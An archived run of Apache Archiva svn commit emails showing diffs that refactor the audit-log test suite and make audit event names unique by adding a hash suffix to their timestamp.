16 Feb 2010 08:15:49 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7996B23889E5; Tue, 16 Feb 2010 08:15:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910421 - /archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Date: Tue, 16 Feb 2010 08:15:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 16 08:15:29 2010 New Revision: 910421 URL: http://svn.apache.org/viewvc?rev=910421&view=rev Log: centralise the name <-> timestamp construction to make it easier to change the pattern Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java?rev=910421&r1=910420&r2=910421&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Tue Feb 16 08:15:29 2010 @@ -103,7 +103,7 @@ List<String> eventNames = new ArrayList<String>( numEvents ); for ( int i = 0; i < numEvents; i++ ) { - eventNames.add( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ); + eventNames.add( createEventName( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ) ); } metadataRepositoryControl.expectAndReturn( @@ -125,32 +125,13 @@ for ( AuditEvent event : events ) { String num = MILLIS_FORMAT.format( expectedTimestampCounter ); - assertEvent( event, AUDIT_EVENT_BASE + num, TEST_RESOURCE_BASE + "/" + num ); + assertTestEvent( event, AUDIT_EVENT_BASE + num, getDefaultTestResourceName( num ) ); expectedTimestampCounter--; } metadataRepositoryControl.verify(); } - private static AuditEvent createTestEvent( String name ) - throws ParseException - { - return createTestEvent( TEST_REPO_ID, name ); - } - - private static AuditEvent createTestEvent( String repositoryId, String name ) - throws ParseException - { - AuditEvent event = new AuditEvent(); - event.setTimestamp( TIMESTAMP_FORMAT.parse( name ) ); - event.setAction( AuditEvent.UPLOAD_FILE ); - event.setRemoteIP( TEST_IP_ADDRESS ); - event.setRepositoryId( repositoryId ); - event.setUserId( TEST_USER ); - event.setResource( TEST_RESOURCE_BASE + "/" + name.substring( AUDIT_EVENT_BASE.length() ) ); - return event; - } - public void testGetMostRecentEventsLessThan10() throws ParseException { @@ -158,7 +139,7 @@ List<String> eventNames = new ArrayList<String>( numEvents ); for ( int i = 0; i < numEvents; i++ ) { - eventNames.add( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ); + eventNames.add( createEventName( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ) ); } metadataRepositoryControl.expectAndReturn( @@ -180,7 +161,7 @@ for ( AuditEvent event : events ) { String num = MILLIS_FORMAT.format( expectedTimestampCounter ); - assertEvent( event, AUDIT_EVENT_BASE + num, TEST_RESOURCE_BASE + "/" + num ); + assertTestEvent( event, AUDIT_EVENT_BASE + num, getDefaultTestResourceName( num ) ); expectedTimestampCounter--; } @@ -197,7 +178,7 @@ eventNames.put( TEST_REPO_ID_2, new ArrayList<String>() ); for ( int i = 0; i < numEvents; i++ ) { - String name = AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ); + String name = createEventName( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ); String repositoryId = i % 2 == 0 ? TEST_REPO_ID : TEST_REPO_ID_2; eventNames.get( repositoryId ).add( name ); events.add( createTestEvent( repositoryId, name ) ); @@ -224,29 +205,14 @@ for ( AuditEvent event : events ) { String num = MILLIS_FORMAT.format( expectedTimestampCounter ); - assertEvent( event, AUDIT_EVENT_BASE + num, TEST_RESOURCE_BASE + "/" + num, - expectedTimestampCounter % 2 == 0 ? TEST_REPO_ID : TEST_REPO_ID_2 ); + String expectedRepoId = expectedTimestampCounter % 2 == 0 ? TEST_REPO_ID : TEST_REPO_ID_2; + assertTestEvent( event, expectedRepoId, AUDIT_EVENT_BASE + num, getDefaultTestResourceName( num ) ); expectedTimestampCounter--; } metadataRepositoryControl.verify(); } - private static void assertEvent( AuditEvent event, String name, String resource ) - { - assertEvent( event, name, resource, TEST_REPO_ID ); - } - - private static void assertEvent( AuditEvent event, String name, String resource, String repositoryId ) - { - assertEquals( name, TIMESTAMP_FORMAT.format( event.getTimestamp() ) ); - assertEquals( AuditEvent.UPLOAD_FILE, event.getAction() ); - assertEquals( TEST_IP_ADDRESS, event.getRemoteIP() ); - assertEquals( repositoryId, event.getRepositoryId() ); - assertEquals( TEST_USER, event.getUserId() ); - assertEquals( resource, event.getResource() ); - } - public void testGetMostRecentEventsWhenEmpty() { metadataRepositoryControl.expectAndReturn( @@ -261,7 +227,7 @@ public void testAddAuditEvent() throws ParseException { - String name = TIMESTAMP_FORMAT.format( new Date() ); + String name = createEventName( new Date() ); AuditEvent event = createTestEvent( name ); metadataRepository.addMetadataFacet( TEST_REPO_ID, event ); @@ -276,7 +242,7 @@ public void testAddAuditEventNoRepositoryId() throws ParseException { - String name = TIMESTAMP_FORMAT.format( new Date() ); + String name = createEventName( new Date() ); AuditEvent event = createTestEvent( null, name ); // should just be ignored @@ -304,11 +270,11 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + String name1 = createEventName( new Date( current.getTime() - 12345 ) ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent = createTestEvent( name2 ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + String name3 = createEventName( new Date( current.getTime() - 1000 ) ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), @@ -325,7 +291,7 @@ new Date( current.getTime() - 2000 ) ); assertEquals( 1, events.size() ); - assertEvent( events.get( 0 ), name2, expectedEvent.getResource() ); + assertTestEvent( events.get( 0 ), TIMESTAMP_FORMAT.format( expectedTimestamp ), expectedEvent.getResource() ); metadataRepositoryControl.verify(); } @@ -335,11 +301,12 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + String name1 = createEventName( new Date( current.getTime() - 12345 ) ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent2 = createTestEvent( name2 ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + Date ts3 = new Date( current.getTime() - 1000 ); + String name3 = createEventName( ts3 ); AuditEvent expectedEvent3 = createTestEvent( name3 ); metadataRepositoryControl.expectAndReturn( @@ -357,8 +324,8 @@ new Date( current.getTime() - 4000 ), current ); assertEquals( 2, events.size() ); - assertEvent( events.get( 0 ), name3, expectedEvent3.getResource() ); - assertEvent( events.get( 1 ), name2, expectedEvent2.getResource() ); + assertTestEvent( events.get( 0 ), TIMESTAMP_FORMAT.format( ts3 ), expectedEvent3.getResource() ); + assertTestEvent( events.get( 1 ), TIMESTAMP_FORMAT.format( expectedTimestamp ), expectedEvent2.getResource() ); metadataRepositoryControl.verify(); } @@ -368,12 +335,13 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + Date ts1 = new Date( current.getTime() - 12345 ); + String name1 = createEventName( ts1 ); AuditEvent expectedEvent1 = createTestEvent( name1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent2 = createTestEvent( name2 ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + String name3 = createEventName( new Date( current.getTime() - 1000 ) ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), @@ -391,8 +359,8 @@ new Date( current.getTime() - 2000 ) ); assertEquals( 2, events.size() ); - assertEvent( events.get( 0 ), name2, expectedEvent2.getResource() ); - assertEvent( events.get( 1 ), name1, expectedEvent1.getResource() ); + assertTestEvent( events.get( 0 ), TIMESTAMP_FORMAT.format( expectedTimestamp ), expectedEvent2.getResource() ); + assertTestEvent( events.get( 1 ), TIMESTAMP_FORMAT.format( ts1 ), expectedEvent1.getResource() ); metadataRepositoryControl.verify(); } @@ -402,12 +370,14 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + Date ts1 = new Date( current.getTime() - 12345 ); + String name1 = createEventName( ts1 ); AuditEvent expectedEvent1 = createTestEvent( name1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent2 = createTestEvent( name2 ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + Date ts3 = new Date( current.getTime() - 1000 ); + String name3 = createEventName( ts3 ); AuditEvent expectedEvent3 = createTestEvent( name3 ); metadataRepositoryControl.expectAndReturn( @@ -427,9 +397,9 @@ new Date( current.getTime() - 20000 ), current ); assertEquals( 3, events.size() ); - assertEvent( events.get( 0 ), name3, expectedEvent3.getResource() ); - assertEvent( events.get( 1 ), name2, expectedEvent2.getResource() ); - assertEvent( events.get( 2 ), name1, expectedEvent1.getResource() ); + assertTestEvent( events.get( 0 ), TIMESTAMP_FORMAT.format( ts3 ), expectedEvent3.getResource() ); + assertTestEvent( events.get( 1 ), TIMESTAMP_FORMAT.format( expectedTimestamp ), expectedEvent2.getResource() ); + assertTestEvent( events.get( 2 ), TIMESTAMP_FORMAT.format( ts1 ), expectedEvent1.getResource() ); metadataRepositoryControl.verify(); } @@ -439,13 +409,15 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + Date ts1 = new Date( current.getTime() - 12345 ); + String name1 = createEventName( ts1 ); AuditEvent expectedEvent1 = createTestEvent( name1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent2 = createTestEvent( name2 ); expectedEvent2.setResource( "different-resource" ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + Date ts3 = new Date( current.getTime() - 1000 ); + String name3 = createEventName( ts3 ); AuditEvent expectedEvent3 = createTestEvent( name3 ); metadataRepositoryControl.expectAndReturn( @@ -466,8 +438,8 @@ new Date( current.getTime() - 20000 ), current ); assertEquals( 2, events.size() ); - assertEvent( events.get( 0 ), name3, expectedEvent3.getResource() ); - assertEvent( events.get( 1 ), name1, expectedEvent1.getResource() ); + assertTestEvent( events.get( 0 ), TIMESTAMP_FORMAT.format( ts3 ), expectedEvent3.getResource() ); + assertTestEvent( events.get( 1 ), TIMESTAMP_FORMAT.format( ts1 ), expectedEvent1.getResource() ); metadataRepositoryControl.verify(); } @@ -477,13 +449,13 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + String name1 = createEventName( new Date( current.getTime() - 12345 ) ); AuditEvent expectedEvent1 = createTestEvent( name1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent2 = createTestEvent( name2 ); expectedEvent2.setResource( "different-resource" ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + String name3 = createEventName( new Date( current.getTime() - 1000 ) ); AuditEvent expectedEvent3 = createTestEvent( name3 ); metadataRepositoryControl.expectAndReturn( @@ -512,12 +484,14 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + Date ts1 = new Date( current.getTime() - 12345 ); + String name1 = createEventName( ts1 ); AuditEvent expectedEvent1 = createTestEvent( TEST_REPO_ID, name1 ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); + String name2 = createEventName( expectedTimestamp ); AuditEvent expectedEvent2 = createTestEvent( TEST_REPO_ID_2, name2 ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + Date ts3 = new Date( current.getTime() - 1000 ); + String name3 = createEventName( ts3 ); AuditEvent expectedEvent3 = createTestEvent( TEST_REPO_ID, name3 ); metadataRepositoryControl.expectAndReturn( @@ -538,9 +512,10 @@ new Date( current.getTime() - 20000 ), current ); assertEquals( 3, events.size() ); - assertEvent( events.get( 0 ), name3, expectedEvent3.getResource() ); - assertEvent( events.get( 1 ), name2, expectedEvent2.getResource(), TEST_REPO_ID_2 ); - assertEvent( events.get( 2 ), name1, expectedEvent1.getResource() ); + assertTestEvent( events.get( 0 ), TEST_REPO_ID, TIMESTAMP_FORMAT.format( ts3 ), expectedEvent3.getResource() ); + assertTestEvent( events.get( 1 ), TEST_REPO_ID_2, TIMESTAMP_FORMAT.format( expectedTimestamp ), + expectedEvent2.getResource() ); + assertTestEvent( events.get( 2 ), TEST_REPO_ID, TIMESTAMP_FORMAT.format( ts1 ), expectedEvent1.getResource() ); metadataRepositoryControl.verify(); } @@ -550,10 +525,10 @@ { Date current = new Date(); - String name1 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 12345 ) ); + String name1 = createEventName( new Date( current.getTime() - 12345 ) ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = TIMESTAMP_FORMAT.format( expectedTimestamp ); - String name3 = TIMESTAMP_FORMAT.format( new Date( current.getTime() - 1000 ) ); + String name2 = createEventName( expectedTimestamp ); + String name3 = createEventName( new Date( current.getTime() - 1000 ) ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), @@ -569,4 +544,56 @@ metadataRepositoryControl.verify(); } + + private static String getDefaultTestResourceName( String num ) + { + return TEST_RESOURCE_BASE + "/" + num + ".xml"; + } + + private static String createEventName( Date timestamp ) + { + AuditEvent event = new AuditEvent(); + event.setTimestamp( timestamp ); + return event.getName(); + } + + private static AuditEvent createTestEvent( String name ) + throws ParseException + { + return createTestEvent( TEST_REPO_ID, name ); + } + + private static AuditEvent createTestEvent( String repoId, String name ) + throws ParseException + { + return createEvent( repoId, name, getDefaultTestResourceName( name.substring( name.length() - 3 ) ) ); + } + + private static AuditEvent createEvent( String repositoryId, String timestamp, String resource ) + throws ParseException + { + AuditEvent event = new AuditEvent(); + event.setTimestamp( TIMESTAMP_FORMAT.parse( timestamp ) ); + event.setAction( AuditEvent.UPLOAD_FILE ); + event.setRemoteIP( TEST_IP_ADDRESS ); + event.setRepositoryId( repositoryId ); + event.setUserId( TEST_USER ); + event.setResource( resource ); + return event; + } + + private static void assertTestEvent( AuditEvent event, String timestamp, String resource ) + { + assertTestEvent( event, TEST_REPO_ID, timestamp, resource ); + } + + private static void assertTestEvent( AuditEvent event, String repositoryId, String timestamp, String resource ) + { + assertEquals( timestamp, TIMESTAMP_FORMAT.format( event.getTimestamp() ) ); + assertEquals( AuditEvent.UPLOAD_FILE, event.getAction() ); + assertEquals( TEST_IP_ADDRESS, event.getRemoteIP() ); + assertEquals( repositoryId, event.getRepositoryId() ); + assertEquals( TEST_USER, event.getUserId() ); + assertEquals( resource, event.getResource() ); + } } \ No newline at end of file From [email protected] Tue Feb 16 09:48:39 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23010 invoked from network); 16 Feb 2010 09:48:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 09:48:39 -0000 Received: (qmail 83136 invoked by uid 500); 16 Feb 2010 09:48:38 -0000 Delivered-To: [email protected] Received: (qmail 83080 invoked by uid 500); 16 Feb 2010 09:48:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83071 invoked by uid 99); 16 Feb 2010 09:48:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 09:48:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 09:48:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id AFCEB23889E5; Tue, 16 Feb 2010 09:48:17 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910447 - in /archiva/branches/MRM-1025/archiva-modules: archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/ plugins/audit/src/main/java/org/apache/archiva/audit/ plugins/audit/src/test/java/org/ap... Date: Tue, 16 Feb 2010 09:48:17 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 16 09:48:16 2010 New Revision: 910447 URL: http://svn.apache.org/viewvc?rev=910447&view=rev Log: avoid timing issues with audit logs Modified: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java?rev=910447&r1=910446&r2=910447&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-repository-layer/src/main/java/org/apache/maven/archiva/repository/audit/AuditEvent.java Tue Feb 16 09:48:16 2010 @@ -117,6 +117,8 @@ private static final TimeZone UTC_TIME_ZONE = TimeZone.getTimeZone( "UTC" ); + private static final int TS_LENGTH = TIMESTAMP_FORMAT.length(); + public AuditEvent() { /* do nothing */ @@ -124,14 +126,26 @@ public AuditEvent( String name, String repositoryId ) { + String ts = name.substring( 0, TS_LENGTH ); try { - timestamp = createNameFormat().parse( name ); + timestamp = createNameFormat().parse( ts ); } catch ( ParseException e ) { - throw new IllegalArgumentException( "Improperly formatted timestamp for audit log event: " + name ); + throw new IllegalArgumentException( "Improperly formatted timestamp for audit log event: " + ts ); } + + if ( name.length() > TS_LENGTH ) + { + if ( name.charAt( TS_LENGTH ) != '/' ) + { + throw new IllegalArgumentException( + "Improperly formatted name for audit log event, no / separator between timestamp and resource: " + + name ); + } + } + this.repositoryId = repositoryId; } @@ -211,7 +225,11 @@ public String getName() { - return createNameFormat().format( timestamp ); + // use the hashCode here to make it unique if multiple events occur at a certain timestamp. None of the other + // fields is unique on its own + return createNameFormat().format( timestamp ) + "/" + Integer.toHexString( hashCode() ); + // TODO: a simple incremental counter might be better since it will retain ordering, but then we need to do a + // bit of locking... } private static SimpleDateFormat createNameFormat() Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java?rev=910447&r1=910446&r2=910447&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/main/java/org/apache/archiva/audit/DefaultAuditManager.java Tue Feb 16 09:48:16 2010 @@ -57,10 +57,10 @@ List<AuditRecord> records = new ArrayList<AuditRecord>(); for ( String repositoryId : repositoryIds ) { - List<String> timestamps = metadataRepository.getMetadataFacets( repositoryId, AuditEvent.FACET_ID ); - for ( String timestamp : timestamps ) + List<String> names = metadataRepository.getMetadataFacets( repositoryId, AuditEvent.FACET_ID ); + for ( String name : names ) { - records.add( new AuditRecord( repositoryId, timestamp ) ); + records.add( new AuditRecord( repositoryId, name ) ); } } Collections.sort( records ); Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java?rev=910447&r1=910446&r2=910447&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Tue Feb 16 09:48:16 2010 @@ -178,10 +178,11 @@ eventNames.put( TEST_REPO_ID_2, new ArrayList<String>() ); for ( int i = 0; i < numEvents; i++ ) { - String name = createEventName( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ); String repositoryId = i % 2 == 0 ? TEST_REPO_ID : TEST_REPO_ID_2; - eventNames.get( repositoryId ).add( name ); - events.add( createTestEvent( repositoryId, name ) ); + String num = MILLIS_FORMAT.format( i ); + AuditEvent event = createEvent( repositoryId, AUDIT_EVENT_BASE + num, getDefaultTestResourceName( num ) ); + events.add( event ); + eventNames.get( repositoryId ).add( event.getName() ); } metadataRepositoryControl.expectAndReturn( @@ -551,10 +552,10 @@ } private static String createEventName( Date timestamp ) + throws ParseException { - AuditEvent event = new AuditEvent(); - event.setTimestamp( timestamp ); - return event.getName(); + // TODO: I think we can reverse the calls. + return createEvent( TEST_REPO_ID, TIMESTAMP_FORMAT.format( timestamp ), null ).getName(); } private static AuditEvent createTestEvent( String name ) @@ -566,7 +567,8 @@ private static AuditEvent createTestEvent( String repoId, String name ) throws ParseException { - return createEvent( repoId, name, getDefaultTestResourceName( name.substring( name.length() - 3 ) ) ); + return createEvent( repoId, name, getDefaultTestResourceName( + name.substring( AUDIT_EVENT_BASE.length(), AUDIT_EVENT_BASE.length() + 3 ) ) ); } private static AuditEvent createEvent( String repositoryId, String timestamp, String resource ) From [email protected] Tue Feb 16 10:20:24 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41196 invoked from network); 16 Feb 2010 10:20:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 10:20:24 -0000 Received: (qmail 15220 invoked by uid 500); 16 Feb 2010 10:20:24 -0000 Delivered-To: [email protected] Received: (qmail 15161 invoked by uid 500); 16 Feb 2010 10:20:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15152 invoked by uid 99); 16 Feb 2010 10:20:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 10:20:23 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 10:20:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E6B0E2388900; Tue, 16 Feb 2010 10:19:58 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910453 - /archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Date: Tue, 16 Feb 2010 10:19:58 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Tue Feb 16 10:19:58 2010 New Revision: 910453 URL: http://svn.apache.org/viewvc?rev=910453&view=rev Log: simplify test case Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Modified: archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java?rev=910453&r1=910452&r2=910453&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/audit/src/test/java/org/apache/archiva/audit/AuditManagerTest.java Tue Feb 16 10:19:58 2010 @@ -100,21 +100,21 @@ throws ParseException { int numEvents = 11; - List<String> eventNames = new ArrayList<String>( numEvents ); + List<AuditEvent> expectedEvents = new ArrayList<AuditEvent>( numEvents ); for ( int i = 0; i < numEvents; i++ ) { - eventNames.add( createEventName( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ) ); + AuditEvent event = createEvent( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ); + expectedEvents.add( event ); } metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), eventNames ); + metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), + getEventNames( expectedEvents ) ); - for ( String name : eventNames.subList( 1, eventNames.size() ) ) + for ( AuditEvent event : expectedEvents.subList( 1, expectedEvents.size() ) ) { - AuditEvent event = createTestEvent( name ); - metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name ), event ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, event.getName() ), event ); } metadataRepositoryControl.replay(); @@ -136,21 +136,20 @@ throws ParseException { int numEvents = 5; - List<String> eventNames = new ArrayList<String>( numEvents ); + List<AuditEvent> expectedEvents = new ArrayList<AuditEvent>( numEvents ); for ( int i = 0; i < numEvents; i++ ) { - eventNames.add( createEventName( TIMESTAMP_FORMAT.parse( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ) ); + expectedEvents.add( createEvent( AUDIT_EVENT_BASE + MILLIS_FORMAT.format( i ) ) ); } metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), eventNames ); + metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), + getEventNames( expectedEvents ) ); - for ( String name : eventNames ) + for ( AuditEvent event : expectedEvents ) { - AuditEvent event = createTestEvent( name ); - metadataRepositoryControl.expectAndReturn( - metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, name ), event ); + metadataRepository.getMetadataFacet( TEST_REPO_ID, AuditEvent.FACET_ID, event.getName() ), event ); } metadataRepositoryControl.replay(); @@ -228,8 +227,7 @@ public void testAddAuditEvent() throws ParseException { - String name = createEventName( new Date() ); - AuditEvent event = createTestEvent( name ); + AuditEvent event = createEvent( new Date() ); metadataRepository.addMetadataFacet( TEST_REPO_ID, event ); @@ -243,8 +241,8 @@ public void testAddAuditEventNoRepositoryId() throws ParseException { - String name = createEventName( new Date() ); - AuditEvent event = createTestEvent( null, name ); + AuditEvent event = createEvent( new Date() ); + event.setRepositoryId( null ); // should just be ignored @@ -271,19 +269,19 @@ { Date current = new Date(); - String name1 = createEventName( new Date( current.getTime() - 12345 ) ); + AuditEvent event1 = createEvent( new Date( current.getTime() - 12345 ) ); Date expectedTimestamp = new Date( current.getTime() - 3000 ); - String name2 = createEventName( expectedTimestamp ); - AuditEvent expectedEvent = createTestEvent( name2 ); - String name3 = createEventName( new Date( current.getTime() - 1000 ) ); + AuditEvent expectedEvent = createEvent( expectedTimestamp ); + AuditEvent event3 = createEvent( new Date( current.getTime() - 1000 ) ); metadataRepositoryControl.expectAndReturn( metadataRepository.getMetadataFacets( TEST_REPO_ID, AuditEvent.FACET_ID ), - Arrays.asList( name1, name2, name3 ) ); + Arrays.asList( event1.getName(), 